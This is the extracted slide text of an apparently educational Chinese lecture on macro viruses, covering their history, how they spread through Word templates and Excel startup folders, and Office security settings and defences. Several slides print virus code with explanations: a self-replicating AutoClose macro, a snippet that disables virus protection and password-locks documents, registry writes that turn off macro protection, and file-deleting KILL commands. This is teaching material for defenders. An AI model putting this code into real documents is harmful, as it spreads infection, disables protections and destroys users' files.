第十講宏病毒分析

第十講

宏病毒分析本講概要本講將針對宏病毒展開詳細的討論，就宏的概念，宏病毒的歷史，宏病毒原理，破化特性和應(yīng)對之策進行學(xué)習(xí)。2本講目標 通過本講學(xué)習(xí)，學(xué)員應(yīng)該掌握宏病毒的基本知識，了解宏病毒的機制和防護辦法。

與上一講一樣，本章旨在讓學(xué)員能深入了解宏病毒的傳播途徑和方式，以利于更加深刻的理解針對宏病毒的防御方法和措施，并非要求學(xué)員掌握編寫該類型病毒的技能。3宏允許用戶在做一些重復(fù)工作（例如打開、修改和保存文件）時提高自動化程度很多主流軟件包括MicrosoftWord,MicrosoftExcel,MicrosoftPowerPoint,Visio,和LotusAmiPro都有很強的編寫宏的功能宏4宏并不局限于同一種軟件創(chuàng)建的文件，別的文件類型也同樣這使得使用宏編寫一個文件傳播到另一個文件的病毒程序變得相對簡單宏5歷史簡介第一個宏病毒–LOTUS123簡單的宏語言文件的訪問是通過菜單條第一個真正的宏病毒–DMV(DocumentMacroVirus)December,1994JoelMcNamara是為了示范宏病毒的可能性而編寫的第一個傳播的宏病毒–WM/ConceptSummer,19956各種平臺以及軟件MicrosoftOfficeWinWordExcelPowerPointAccessAmiProCorelDrawPCMacintoshDECAlphaWindowsMacOSSoftWindows7SoftWindows988VBA3,VBA5,VBA6&Excel宏語言Formula–Excel4.0VBA3–Excel5.0WordBasic–Word6.0VBA5–Office97applicationsVBA6–Office2000注

從WinWord7.0a–1st

以后，微軟的程序開始自帶防病毒的警告機制9VisualBasicforApplicationsJanuary1997微軟發(fā)布Office97(所有的程序都采用VBA5)Word8.0可以轉(zhuǎn)化（重編碼）以前的宏到新的語言版本轉(zhuǎn)化的成功率–90%自動刪除常見的宏病毒以阻止它們的傳播WM/Concept.A,WM/Wazzu.A

和WM/Npad.A比WordBasic擁有更復(fù)雜的語言在OLE2文件中，宏用兩種不同的實體方式存在編譯過的宏語言體壓縮過的宏文本10MainTitle,

60pt.,U/Lcase

LS=.8linesOFFICE中的宏11查看宏VisualBasic編輯器注：調(diào)用VB編輯器的快捷方式：Alt-F11查看宏代碼可以點擊Tools>Macro>VisualBasicEditor12禁用宏打開時針對Office95and97針對Office200013禁用宏打開宏病毒防護功能(Office97)單擊Tools>Options在Options

對話框，選中Macrovirusprotection14禁用宏打開宏病毒防護功能(Office2000)單擊Tools>Macro>Security在Security

對話框中，選擇

High或Medium15調(diào)試VBA設(shè)置斷點斷點會在被設(shè)置的位置中斷程序代碼的執(zhí)行點擊代碼窗口左側(cè)灰色空白處以設(shè)置斷點.斷點會被高亮顯示出來，并且左邊有一個紅點顯示16調(diào)試VBA變量的值為了查看一個變量的值，指向該變量（在調(diào)試模式下）該變量的值會自動顯示出來17MSWord宏病毒W(wǎng)ord病毒感染通用模板，該文件的名字為NORMAL.DOT.

該文件維護缺省的和用戶自定義的關(guān)于MS-Word的設(shè)置該文件的修改會影響所有后來用word打開的文件18WORD宏病毒的生命周期某個宏病毒對文檔取得控制權(quán)該病毒將自身復(fù)制到通用模板通用模板在啟動時自動調(diào)用某些受感染文件會直接查找硬盤上的相關(guān)文件有時會使用最近打開的文件列表其它的會把自己復(fù)制到模板文件中去（類似通用模板）19MicrosoftExcel病毒這些病毒在執(zhí)行的時候會將自身復(fù)制到其它的Excel文件中去，同時在Excel的啟動文件夾中也會留下一份拷貝MSExcel在啟動的時候會自動加載在這個文件夾中的所有文件20EXCEL宏病毒的生命周期Excel病毒在啟動文件夾XLSTART中生成一個新的啟動文件Excel在下次運行時加載該文件(PERSONAL.XLS)Excel不檢查文件的后綴名，因此許多病毒遺留下來的文件就不添加后綴名，比如‘BOOK1’21MicrosoftOfficeAutoMacros這些宏的自動執(zhí)行的特點使得病毒的編寫成為可能一個自動執(zhí)行的宏語句是指在滿足某個特定的條件下會自動執(zhí)行，并不需要用戶顯式的執(zhí)行22AutoMacro范例MicrosoftWordAutoOpen

AutoClose

AutoExec

AutoExit

AutoNewMicrosoftExcelAuto_OpenAuto_CloseAuto_ActivateAuto_Deactivate23菜單關(guān)聯(lián)/快捷鍵將宏和菜單欄的某個選項相關(guān)聯(lián)刪除和修改菜單欄中的項目將宏和鍵盤上的某個鍵相關(guān)聯(lián)這些方法可以取代使用auto-macros的方法取得控制權(quán)24多態(tài)宏病毒舉例W97M/CLASS.A&W97M/STP利用WinWord的編輯功能修改自身的代碼25隱形和加密病毒代碼防止被輕易查看到的措施26隱形和加密：續(xù)27隱形和加密：續(xù)宏病毒存儲時代碼隨機打亂28口令保護WinWord6.0/7.0整個文件可以進行密碼保護整個文件被打亂不能訪問該文件和其中的宏Office97/2000在文檔用密碼進行保護后，宏語句還是可以被查看到29文件損壞和手動編輯WinWord6.0在宏語句進行復(fù)制的時候有一個程序的錯誤這會導(dǎo)致WM/NPAD200個不同的變種1997/98-自然的損壞是病毒主要來源Office97可以用VBE進行編輯(ALT+F11)用戶手動編輯出來的宏是病毒的主要來源30其它手動刪除某些外來的宏語句防病毒產(chǎn)品沒有完全將宏病毒正確清除WinWord在復(fù)制宏語句時異常終止由于Word6.0的其它原因生成的不正常的宏語句VBA5/VBA6在單一模組中允許多項功能和多個事件操作同時進行Office97/2000–很少有其它情形下產(chǎn)生的宏病毒31混合不同的宏病毒存在在一個用戶系統(tǒng)中從其它的宏病毒中”借鑒”從通用模板中的宏語句獲取相應(yīng)的信息相同的病毒往往處在同一類型的模組中,稱為‘ThisDocument’或‘ThisWorkbook’32病毒代碼SubAutoClose()OnErrorResumeNextApplication.VBE.ActiveVBProject.VBComponents("demo").Export"c:\demo.sys"ForI=1ToNormalTemplate.VBProject.VBComponents.CountIfNormalTemplate.VBProject.VBComponents(I).Name="demo"Then

NormInstall=TrueNextIForI=1ToActiveDocument.VBProject.VBComponents.CountIfActiveDocument.VBProject.VBComponents(I).Name="demo"Then

ActivInstall=TrueNextIIfActivInstall=TrueAndNormInstall=FalseThen SetDobj=NormalTemplate.VBProject

ElseIfActivInstall=FalseAndNormInstall=TrueThen SetDobj=ActiveDocument.VBProjectDobj.VBComponents.Import("c:\demo.sys")EndSub33運行邏輯導(dǎo)出到C:\DEMO.SYS(病毒源代碼)檢查是否已經(jīng)安裝在NORMAL.DOT-如果是的話,設(shè)置變量

檢查是否已經(jīng)安裝在活動文件中–如果是的話設(shè)置變量如果在NORMAL.DOT中沒有的話將C:\DEMO.SYS導(dǎo)入如果在活動文件中沒有的話將C:\DEMO.SYS導(dǎo)入34代碼分析

SubAutoClose()當文件關(guān)閉時會自動啟用OnErrorResumeNext如果出錯,就接下去執(zhí)行下面的指示ForI=1ToNormalTemplate.VBProject.VBComponents.Count在normal.dot

中根據(jù)模組中的數(shù)目重復(fù)執(zhí)行下面的代碼35代碼分析：續(xù)

IfNormalTemplate.VBProject.VBComponents(I).Name="demo"ThenNormInstall=True如果在normal.dot中有名為“demo”的模組，將NormInstall的變量值置為１（true）NextI重復(fù)執(zhí)行一遍ForI=1ToActiveDocument.VBProject.VBComponents.Count根據(jù)活動文件中模組的數(shù)目重復(fù)執(zhí)行下面的代碼36代碼分析：續(xù)

IfActiveDocument.VBProject.VBComponents(I).Name="demo"ThenActivInstall=True如果在活動文件中有名為“demo”的模組，將ActivInstall的變量值置為１（true）NextI重復(fù)執(zhí)行一次IfActivInstall=TrueAndNormInstall=FalseThenSetDobj=NormalTemplate.VBProject如果在當前文檔中安裝完畢，但在normal.dot中沒有的話，導(dǎo)入到normal.dot文檔中37代碼分析：續(xù)

ElseIfActivInstall=FalseAndNormInstall=TrueThenSetDobj=ActiveDocument.VBProject另外，如果已經(jīng)安裝在normal.dot中而在當前文檔中沒有的話，導(dǎo)入到當前文檔中

Dobj.VBComponents.Import("c:\demo.sys")這將會把c:\demo.sys導(dǎo)入到normal.dot或者活動文檔，根據(jù)上面設(shè)置的變量值決定SetDobj=ActiveDocument.VBProject這樣的話，我們只需參考Dobj.VBComponents.Import("c:\demo.sys")`38提示!!!39MainTitle,

60pt.,U/Lcase

LS=.8linesOffice2000和宏的安全性40新特性數(shù)字簽名安全級別信任源插件和模板防病毒的專用接口Office97的弱點注冊表的安全設(shè)置41數(shù)字簽名Office2000(Word/Excel/PowerPoint)現(xiàn)在支持數(shù)字簽名的VBA宏Access2000不支持數(shù)字簽名數(shù)字簽名只被應(yīng)用到VBA項目的內(nèi)容文本內(nèi)容的變化不影響數(shù)字簽名添加新的宏語句會導(dǎo)致數(shù)字簽名失效42數(shù)字簽名43安全級別低安全級別中等安全級別高安全級別44低安全級別沒有安全保障宏會完全執(zhí)行，沒有任何警告提示45中等安全級別需要征求用戶的意見是否執(zhí)行宏語句有數(shù)字簽名的宏會被啟用46高安全級別禁用沒有簽名的宏（不會有警告提示）有數(shù)字簽名的宏可以被禁止或添加到信任列表中去47默認的安全級別Word2000高安全級別Excel2000&PowerPoint2000中等安全級別Access2000不支持48信任源這是在高安全級別時啟用宏的唯一方法添加一個發(fā)行者意味著所有該發(fā)行者提供的宏都會被自動啟用這份列表會被所有的Office程序所共享49信任源50插件和模板對待安裝的插件和模板的方法是和普通文檔一樣的默認情況下，該選項是被禁止的51防毒軟件接口在文件被打開之前，調(diào)用注冊過的掃描器來掃描該文件52Office97的弱點Word97模板的安全補丁Word97&右鍵快捷打印Excel97調(diào)用功能的補丁53Word97模板的安全補丁歷史針對包含帶宏的模板的文檔，Word97打開這種文檔中包含的宏時并不進行任何提示糾正措施安全級別保護和宏掃描應(yīng)用于附加的模板54Word97&右鍵快捷打印歷史當文件在使用右鍵快捷打印功能時，關(guān)于宏病毒的防護功能并沒有被啟用糾正措施安全級別保護和宏掃描應(yīng)用于右鍵快捷打印55Excel97調(diào)用功能的補丁歷史Excel工作簿可以調(diào)用動態(tài)鏈接庫針對這種情況的宏，保護措施并沒有給出預(yù)警糾正措施將工作簿的調(diào)用功能禁止56注冊表的安全設(shè)置關(guān)于安全設(shè)置的注冊表位置HKEY_CURRENT_USER\Software\Microsoft\Office\NN.0\Word\Security57Office2000白皮書HTTP://OFFICE.MICROSOFT.COM/DOWNLOADS/2000/O2KSEC.ASPX58推薦的設(shè)置將所有的Office2000程序的安全級別設(shè)置為高禁用‘Trustallinstalledadd-insandtemplates’選項將Excel4.0-類型的宏轉(zhuǎn)化為VBA將所有的宏簽名，包括插件和模板在注冊表中的鍵值設(shè)置并鎖定為高安全級別使用防毒軟件進行對所有使用的文件進行掃描59Office宏病毒的某些癥狀文件的大小增加了

工具欄上的菜單條被改動過打開一個文件時，CPU利用率變的很高無法打開最近使用過的一些文檔60建議的清除措施使用專業(yè)的防毒軟件進行對宏病毒的自動清除61MainTitle,

60pt.,U/Lcase

LS=.8lines宏病毒的代碼示范62SubAutoOpen()Options.VirusProtection=FalseOptions.ConfirmConversions=FalseOptions.SaveNormalPrompt=FalseIfDay(Now)=Hour(Now)ThenSetFunnyShit=ActiveDocumentFunnyShit.Password="ZeRg1.0"ActiveDocument.SaveEndIf與自動執(zhí)行的宏關(guān)聯(lián)舉例:W97M_ZERG.AVirusCode63SYSTEM.PRIVATEPROFILESTRING("","HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\OFFICE\8.0\NEWUSERSETTINGS\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")=""注冊表修改舉例:WM_TRISTATE64KILL"C:\*.*"KILL"C:\MYDOCUMENTS\*.*"KILL"C:\WIN